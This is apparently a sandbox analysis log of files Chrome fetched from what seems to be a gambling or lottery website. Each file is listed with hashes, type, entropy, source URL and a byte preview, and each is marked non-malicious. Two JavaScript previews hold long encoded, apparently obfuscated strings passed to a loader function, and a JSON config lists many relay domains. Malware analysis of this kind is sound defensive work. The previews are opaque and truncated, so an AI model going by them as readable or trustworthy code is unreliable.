                                                                                                                                                          SHA1:699B9FB8FA80B435037E81AAC72D4D1FDD5FA1AC
                                                                                                                                                          SHA-256:F1EBDD7CB694B2D01550386A7B274DB6B28C6243D76147723E614C232127617B
                                                                                                                                                          SHA-512:FA8190CB90CA691F52FD11C19E272B9E58C3269414CAFC48E664AB41852D8FC9C52B287E5926CB0B4920A3EFA0277D4181995BC8C12F412EABF4F6AC95F8E042
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/menuSubA.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZkIF0AaAbxQDUBHADQC4AzAVzRgBcBLdTJE9kpwCUZAETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQo8gA3KB9mEHoAQgAGAF8hZWC5KRAAXk5MUQARPQAOYFEhEjQ0nTRMEEKfNIyomAhGApJmatEAOQBNAA9VRqgUzDKhTDIYknUtDkxmHQBbKAgAcRB2dmskIexRTiQAGRQAc2MA0TB0CXMUGe3/Ei2kUwB1USIhQrIICwgkek2kZjBjnNOsdjAZgbc7FYkM8SHooOwoExWBxuIMyHJlsw5GgyD5tuwfqQkAALFDAABCZ2+EVwMVGMEuEGYqz09EGw1G4207Cms3mSxWaw2dz2hzQx1OaHOFiukhB9yeL0KwHhMGJ9DIkull2uSLYXB46zI7GJ2x0804lKlSEwQjpJBmy1Jem+ZCMPlWch2+L1KMNIgx7CxaBkAH4HKakDptqLjAAfOMms3bR5CABkaaTUZJZKtElD3yj7s9mBY+tRvADmOxonJAElWpknOTVK0AKoAZVEERSUZgPigAC9B3FCaN9ssAMID4e+g1lPgCYTo6shnz6QxQXzsHTk0E6ftDwd7tB6Xj8QR2kiSdgPTh6E1zisiTiMCNmoEiRIyFIAEgyADEfxgO4IBSk4ogANRZjowHRnohTsL2OhGKeGSzGBzAALR4rIWG+PQIDUJgURCAUyhFqC6GOlKOH4vhPgFAeSA2qIwD3iaAQ7qhZ6iHiTFIJwg4gLaABUDgoVRfGcIRxGkUx7EPsStqQbgQiQaIEDAnaow3qYKDfGWfpoq+mARDBn5kN+SB/tRmFYXMxgAHx4rJGTQZG0aniAnQaWRiG2aIQH/KB4FQTBcH3vE/5BcBoXMBBHlmpFCHMTauKGASUYoIwjA3raOh+Iw7BYe48LEuaYA2rwOiKSatpYT
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 12 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):193
                                                                                                                                                          Entropy (8bit):6.205020240126718
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:6v/lhPk7LB/6TanghzaNpsbDp87NEYT+NXjp:6v/7y/6T7h4Sy7TE
                                                                                                                                                          MD5:EF5A8D982FC89F6572E6C0517DDB9738
                                                                                                                                                          SHA1:37EDC2B6C0C6C01B19C86A76101F0AC1783FFB67
                                                                                                                                                          SHA-256:58848858B0911D63F0F014F0594F1305195CF1320EE9A34FDAC5C93FDF450D06
                                                                                                                                                          SHA-512:E3719960637F84E7ABE3234FC8D074EEDA2A842C4C45C2A542F6021E0D03208F6B39F80241045FAA00ACF2F8DC953E759A2FE730DD8C2C51494F1F6CF15C69E8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR............."a......pHYs................sIDAT(.....0.........s.Z.2.@.........'...).m.=0.D1<..P..*..HZ%.......&:...O.IR.h$.2..^{o.1z..t.....!..~..;..=m9`.(r.......IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2718
                                                                                                                                                          Entropy (8bit):7.649861282250377
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VVsCNn2OBohBJ3bF/XyiZCIg8BGNk1bWjy458spX/9VUl8ecONefbTU1cqH:b2ZC8xg8Bek1CG4is5zU+fb0cqH
                                                                                                                                                          MD5:E2913B0B3A9755D001C1DF6A9A848231
                                                                                                                                                          SHA1:5B563BEA4902BFFCA79E822939B97A54F6FAF199
                                                                                                                                                          SHA-256:7ECFD3A50CF8D3088322ED08629A64F7BF852937E3610456ADE61A5E94FF2E68
                                                                                                                                                          SHA-512:C5E95345FDB1849765AC65C0D479685E8E2B69C038A1462699FC00E7DC7E81BCED57C01EBC0151BAD03CB6F2ED89F3C3A02054FE11CF4A64B14BAF672C1E4DE9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_bgcrown.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)" xmpMM:InstanceID="xmp.iid:CAB284D2268711EC9123809888794D3B" xmpMM:DocumentID="xmp.did:CAB284D3268711EC9123809888794D3B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CAB284D0268711EC9123809888794D3B" stRef:documentID="xmp.did:CAB284D1268711EC9123809888794D3B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.S.....IDATx..Wk.]U.^k.}.9.5.....h:.@..H..TR.".....4h.#`C#.....?Tj.C.. ...%M.1Z.Z"...&.&..SJ.y8s.=...>.I.$.r
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18
                                                                                                                                                          Entropy (8bit):3.4193819456463714
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:3W1n:3W1n
                                                                                                                                                          MD5:65A44FC97C89C6A6EF5AC16143DBFCEC
                                                                                                                                                          SHA1:448ECF2AAFC8FB1D52785E0096DDADE283C852AC
                                                                                                                                                          SHA-256:65F6E0D0B6BF1DE78E8640E5B6497340AA3CDD548AE716CA4EE6D1F0F1014096
                                                                                                                                                          SHA-512:571BC83E5CBCC5AC97A635BF8060C36B24B2EB3601928BF0DFA901478256AEC495044FF1E7E4D89F8954923FDB1C34F0D56FDB772EFBF7C9450FFD4CC2731616
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:request-empty-777.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1380), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1380
                                                                                                                                                          Entropy (8bit):5.793775006412735
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VVlWw08EXYm/ZwDk5lOAO5HaNu9IRq0tjlIYtTm1qWG:VfWNIm2aIjHchjbm1k
                                                                                                                                                          MD5:04509D505B3AAFAFA9B91C94562074E8
                                                                                                                                                          SHA1:154785DE37CA0817F6449EF868436F7178E6E761
                                                                                                                                                          SHA-256:FF397F56C58A8E85397EADD86F51FE249DDD18C472255F40A9D0B6165ADCE251
                                                                                                                                                          SHA-512:77F5F7BB6E1848AD76ECF5FCE04227573D18B0813D2FC0299717EA5FE54F69BF442B0BC134F816C88617D3BA85ABC4D77E93BB693C34A5B1EC0D945F5BD45D5C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/inside.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgEYBdAGgG8AlAMWoGEAuAMwFc0YAXAS3UxFLQBKcgF9SAc0IAPNMzaceaPgNIdhAIhZIQAAiQcATl07qA3AHkwAKxCcAdABMQTLmhAAFAygggDHAJ6YaKTqAPqhIEgAsigOLAA2IOoUAG5Q8SwgDACEAAwigqZpBjpcALwcmOq5MBBM6oKkSGXkaFAAtlnqrkhcTskQXhBIDNjq3J0G6mQwKO0Q6CBoHCPks/MAciDAI6zs3LzCBiAcLAZoOhx2IJi4ABz4gnYcABZLmFdgrg5BCfEhMAAQgA1QENQQiMQOKAcKByfaKTBHE5nNDkLjtcSAqDaBhcRzOKAJK50dD6KDLOwwBxoAASKH0AGp1AB6DFQcQgAC0EBgbLQvScLOS8S4+gYogE2wAyi8UMAGLkmnKFXlSO0UF9ElsdiqcoQmgYYAx1OpIaRgDCYC8JQASLwsDhZPYKXj8ITkYqXCovMWmEB2NqdbJlNCBjogABkkY+vqQdiQKrK2QN2g4ABUMSAUI7MC6DkphFckEayupYNwUlwAuoyhU7Pac07w50APzqQZzFDqBhXRuOgNB/jFpN5MSvMXPLMGVsbFjtMC+WOTia+QQMADMAFZcoIIWJ1hABw4JYn5TEtSBsWg3AZ4a7C+RjqdzlUNZf1CGJ/GSzAAD5/tk352O+XDatsZ7AII0ZVHKnSfnWwG/tGwGivo2BIUaxD7qQMDHDCIAnvmiLCF6IA+mKAhlMA3zynY0oANIAJIbKYlTqIQACCVjiA0VR2MKjJoMy/JOFIdhWEgDTPG8SjEbwHoBrabhSBmxhwHm8gFki5ABmhHChnYPR9FeFK3tGYbGU4163kZTrtABkqDjKSaWQKJk2b4FlGe51lmb4gYQQBSoBr+ZRKQ6zZDqQAageBuryoZcUgDqkEASmBSZWIKAtMcaBOHe8mPmRFFIFRSl4SABEAKKJJ0yyqO
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 61020
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15779
                                                                                                                                                          Entropy (8bit):7.985132186137957
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:HUMeMD7CKDqG9SmepDPqHAZrP0IIdU6QCz+O8kIfHfq37s1:ueuISm6DiHANPIK6R+ffq37s1
                                                                                                                                                          MD5:A82B3B82DA26DF061D5D7D0AB1607C7C
                                                                                                                                                          SHA1:2E6D933FE312254EBF4E07D0BDCFF97E9A0CF0AC
                                                                                                                                                          SHA-256:0796E96C23716CC6ECB811E5066B2E69854E5E5DD36AF768529DC42234302506
                                                                                                                                                          SHA-512:32AB769CA0C66870353B47E126BFE85E258CCF75A36DB411AC32DDCE7D2684953B9F0AA867DAE16FC9DAAFD1BE4533C1E298FA0A30F6D9D9B04C278C88EAEC5C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/js/gui-base.js
                                                                                                                                                          Preview:...........}....q..._1;Z..,.X.4e...}.hK"ER.......,..b `.%..{JbG.-..a.qr....."9...9.}......../\UWwO.L..KJy.`.;...U.U....c..-...o......KW..Ym...r...g.>x..w.z.........I...F.^k`.i..M.f.....r)HBk?.F.(.Zg.W._..}....X.5_..N.............jJ.:..`..p2....n......Q.r....w..n. .&}...g.uY..P.....P..n....'.q....=.m.J....n........Y....X.Xm.6.!......@...p.../;.........r-.o..M...$j.B.r....pO@.77..$....Q...b.X.A<.m..$.....7..7....h..?....../?z.....W.......6....'......>.....w....'..W.../.}...;o..........{.:..g.?......|..............Y......F`..a...%......Am/...a..h......o....._k.....q2.....id..U^xsc.s7....:...m....l.mMxc....{.....UdC...?...W(5..4D...=].u..6...p<..jxo4...X6.p$...M.O?}......@Xm...........;..].U.:.x....r.h........m.JP.D.Go.P.......?..O.~.. |..i.VC...#..tls....(.vo..*Z.H......A......(...D..z.l.Qk...m'p..ZoX.`q_&...q.L.C+.u.^0.$...U.i.T..{...4mD...i._....K.....h?l...=&/..,.&.ho.'4..=.....kBv.l..A..A.Q'H....D...D.L....#...t0..4..x:...A..w1.7........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (6075), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):35313
                                                                                                                                                          Entropy (8bit):5.295540132066821
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:4WL+KxZDns9s+CaAttQyYgm+po5THCAAoT5CvohyZVD/aQHAfr6vWgwkDHqAZ:41kZ9auYo2HCA9tlhytv3wa
                                                                                                                                                          MD5:0D329DF2282392F7C5B7DC987318D388
                                                                                                                                                          SHA1:B49E384DB02B755EAB09D4441ECD9538B9488D56
                                                                                                                                                          SHA-256:18AFA71FF8EB7C6184F4AF6D4CC82F3764997BF1D85B4C74070A215EEEF25A3B
                                                                                                                                                          SHA-512:764B95B306F6BE43895AA884C83078357B59DC5081448D76A645C8D056D4C00FF6DB41B3A002C1A167FE22891F1DE836CB2CF86CB1091068C3E370D602499394
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://js326.cc/default.html
                                                                                                                                                          Preview:<!DOCTYPE html>..<html>....<head>.. <meta charset=utf-8>.. <meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">.. <title></title>.. <style>.. .init-ip-block{position: fixed;top: 0;left: 0;background-color: #000;}#home-fake-app{width:100%;position:absolute;top:0;left:0;z-index:-1}body{margin: 0;padding: 0;}#error-main{position:absolute;top:0;bottom:0;left:0;font-size:14px;text-align:center;width:100%;height:100%;overflow:hidden;box-sizing:border-box;z-index:1000;background-color:#fff }#error-main .middle{position:absolute;width:100%;top:50%;left:0;transform:translateY(-50%) }.tips-img{width:150px;height:93px;margin:auto auto 5px;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAARcAAACtCAMAAACtK8tBAAAA8FBMVEUAAACwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCvr6+wsLCvr6+wsLCwsLCwsLCwsLCwsLCwsLCvr6+vr6+wsLCvr6+urq6wsLCurq6urq6wsLCvr6+wsLCwsLCurq6wsLCwsLCwsLCwsLCwsLCurq6urq6urq6wsLCwsLCwsLCwsLCvr6+wsLCwsLCpqamwsLCtra2pqamwsLCwsLCwsL
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 12153
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2731
                                                                                                                                                          Entropy (8bit):7.935425083385799
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:XKBFUzan/aZ3cwbqL3hEqraljeG96pxGShVxr72jKCtLms9hU2oMuIc+lkbn6uB0:atMbqLaqrCMlCjrzhU2s4An6upmBgE
                                                                                                                                                          MD5:9BB052DF29A425481155415B4FE8BBB2
                                                                                                                                                          SHA1:4BAE89F2F3EFFD7415DC0A9115D11D9EA007316A
                                                                                                                                                          SHA-256:63D1D3F6D761F93B6BDA95E6BF3819F00C329905DBC4D6D2F7996499CCFF3986
                                                                                                                                                          SHA-512:E06989B71F548E260F88FB0B0D6FCF077D4F95F4EB2E622971C79DCA9391B4B19D53AC0613B095B6FFF5FC38FD253C365F5CDC1BF899BC93931686618A398413
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/lazyload.js
                                                                                                                                                          Preview:...........Zo..H....b.......r...wW.-.k./..y.I....i.....I.C.z.^!q..D......iz.-x...=v...n{..Q.uf........pn.\ ..O..>.%.v.7<...a:."2`..H..E..I0v.4..8.m.Oy0..by.r..{m.R....Zp.%7.4f..I...F..I....1....M...=$!d$D..8...f1...{.f|.h....bW...Q....m..2bc.+.07.i..A....N.(...B.4..)O...Kv...r..F.-.!w]`9..D...k....1n...jGlbu.C..z..N.............W.&........O~...?..7".8.q...Q...l(......... .7..`.{H...X-...V.C...l...L.?.x.........=....G..?........o..?....?>../......xn.Q6.d(f.Q.3..V.N..]..HX.....Z.......8NF6#.?..GuZY..............@..gS....P].....g.?}.._.,..L..".mmY.4.....3&.d.z0s.vD.`@,1.)..z/f\$d......Fe+#.6f~.R;'.$00l..@.. ....xi......}s..k.......J\..d)se=7[.N..0d'nH.!#..p..E.... ...=.".M.{.j..)..9.+.R.).<.]....m"{Y .C1.. .x,J.Nr.Pj...VN..GZ.+.]xlu..A5..U............!E]..eec...#Q...k....&..{...q..X...J+.pA..@.Q>.DL...m.8%.....KE............d.....1...c!u..:..%..."xJ..g.$.-X.S/.]...d..h#7<.`^...d..!7G9.D0. ....l:.....I.}.I.&D9.2...D.(..p.zO.H.{...y#..fD
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1183
                                                                                                                                                          Entropy (8bit):7.759551068349599
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:odWbvmeQvHbu9BC3pi8fp4+ZN8frdFz5zuUNNGTV6:bLJOHbUBC3fpKjnlNiI
                                                                                                                                                          MD5:CA3BD9886983F8466A5BDFB873F2195D
                                                                                                                                                          SHA1:F280828EB86E04980D30E119721B5495710531CD
                                                                                                                                                          SHA-256:1E4442B334D2307688561B2975F9991720328763473D8F552C0EC164B6887F78
                                                                                                                                                          SHA-512:C0C885D86876824ACC23C083A427BC31CE2164B689C8E65FF1CCAB20A3D16F24D08772F9DB24E699ACE6229E8DCF32BB795C0F8204A84C044EC6F2A3D55B7AFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/card_bg.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...'..6w ..!}..X.89....+.. ...d%~..U.{.i.|..s.!.."z..S..$z.8{..czL..l.!...{.c.c.)t"|..:.#...*t".."W.?...j.FR.3...,{.9w.)s...*r.3y..b$z.*...j..<|.)q$..'x..I.. l.!n6..:x$..D^.(w..S......o.2...n..h.........\.._..8..'t..e.._..Z......................"..}..{......r.u..[{.5n..c.]o.\l.cQ.%T..B..J.!G..=..;..9}.3}.2|.%o..f..d..R..J......................................>.......f..1....:..+........>..../..........h...............K..Z.....d..`..d..'...w..k..x.....w.Fv.|..f..3s.l...g.'u.r~.8i..i..j..U..T.Wt.ax.iy.Je..^.2d..c..W..W..T..S.Wi..[.8S.O^..L..M.AR.#L..P.XF.?D.PV.7B.MH.>M.^5.IL..M..=."6..?.,>..'..E.!6}b2}..y.,y.&y.(w..r((q..o.!n .n..n..m..i..h..h..g.......=tRNS.. .............................................wwWR;:54/)..........tIDAT(....BmQ.....m#.....m.m.m....U.A.u`.........7/..*?\.W.ivg.+...m.{...,..5]h...5."~....Y]....5%&.1....fW_.=q'':}...0.V......>..eA.7..=..h.7j...jU(8&B.....u._.mxj.x{Q.....}.S.bH...;....i..1..lXr..4
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2747
                                                                                                                                                          Entropy (8bit):5.375842791933336
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Yv1FLJxwewo9BH8/ZxD9Hk4026jz6PB8z76q5HdKgMfWYLgYc/o:GjDco7KJE40OaddrYhfc/o
                                                                                                                                                          MD5:684A47928EC95FD57ACC75A9C16F43EE
                                                                                                                                                          SHA1:57ACCCA0EB61707164460D05D2F18CEF6721DA11
                                                                                                                                                          SHA-256:801ED0B0C075EDC4B8A2B7F221EF89D85BCC729D6C55C21F8B24DC475E6848B6
                                                                                                                                                          SHA-512:1792B200C176987418F96BAF5F1EE6B74AA02C4712E1F8DEF81F8401C4E397BA89CE785482DD7A00F84645F44B9C24E985D690E2293051A4FCAFD3F766CC1ACA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"agentCode":"101323817914","snType":1,"iconRel":"/fileupload/ll12/202312/202312180056235.png","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{"videoProfitDayThreshold":300000,"agentBalanceControlFlat":0,"openUserFeeFlat":1,"openUserPointFlat":0,"lotteryProfitDayThreshold":"1000000","autoDrawAmount":500000,"openAutoDrawFlat":2,"regCaptchaType":"normal","captchaType":"normal","vipShowFlag":0,"smsLoginFlag":0,"thirdpartyTr
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18388
                                                                                                                                                          Entropy (8bit):4.351571195978757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:sPrmmNeqmORafrtTThDeJ+GgJttHVENDYXdk0hfbwSr:0rmFORstThDeJtgJtFVENMXdkMBr
                                                                                                                                                          MD5:AB2CBE8957927CF9923F1435AA517BC8
                                                                                                                                                          SHA1:C1F5439091C7914EE2E65D8E9E4DC31A17327AEC
                                                                                                                                                          SHA-256:36BFC70E4B7D8EE7D2C3687C8F704AE2021A8F1F61FF31AD71C6227C602391D7
                                                                                                                                                          SHA-512:9A51747CC8D842CDF60CD433964529A5CBDD02E83D2972D8059B5935F7EF912757FF4461E757B5F662195F22A86B65F7969151BF9DAA303B5F55FF483C6C6266
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-aka.blackkhaki918.com/ocs/zbw?r=9375188508
                                                                                                                                                          Preview:{. "nnn": "outer-888",. "versions": {. "zb_m": "240606-01",. "zb_pc_member": "240529-01". },. "http": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1585","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1985"]. },. "https": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1586","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1986"]. },. "public_domain": ["cppublbyv2-ali.epie3d.com", "cppublbyv2-hw.zjbxxy.com", "cppublbyv2-ty.huliancc.com"],. "gb_app_ins_domains": ["appiso-ty.souzhanzx.com:1066", "appiso-ty.zvbzjsb.com:8066"],. "gb_plist_api_domains": ["qpplist.lcyj888.com"],. "gb_wx_proxy": "https://wy-ali.meriksenrusso.com",. "gb_disabled_proxy": true,. "gb_is_pc_sp
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24
                                                                                                                                                          Entropy (8bit):4.1887218755408675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:uuKln:uu4n
                                                                                                                                                          MD5:356555E64410CB07748C013C7862421C
                                                                                                                                                          SHA1:9FC2E0D7B2297CAB2DD4824D42BB20AF8CE1B6FE
                                                                                                                                                          SHA-256:9BF353A4E2B515DA809F62D31F61F5FD659AB8FFA04E1AC7A3304F2B05510748
                                                                                                                                                          SHA-512:0A14AE03555EBA744339B7632B8F5D382F60232499BC4D773D88DBDB7E3FAEAB7CC2815477EF59A68D500E648F977ECB68EA03D9DC9CB88FAD7201F2876D9A7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:....(empty-777).
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 37 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2146
                                                                                                                                                          Entropy (8bit):7.506293248392959
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:ozNn286ttdvJ3a/GvN5bPImztphwPSHvgaYIu1i:y21ttq/GvN5bPvzXyIuk
                                                                                                                                                          MD5:80A871A008A510FA0D7CE2410FD023A2
                                                                                                                                                          SHA1:45202DF6EF6F31ACF18BD7EB65AE0733C8DCBAA2
                                                                                                                                                          SHA-256:25B9E28D608998D4FDEDFA45FCF1407745C49B61C32A9A89E002CE42DCDE0ABD
                                                                                                                                                          SHA-512:AA4DBF2760BD2DBA851D392AFE3BEE2D8B619A47CB92D06039CBD74790D143CA0F2B7113EAE9B2BA59017C0BCEF6E71EE3C4E8BE0A8011EB0D710A559986DA46
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/button/icon_coin_n.png
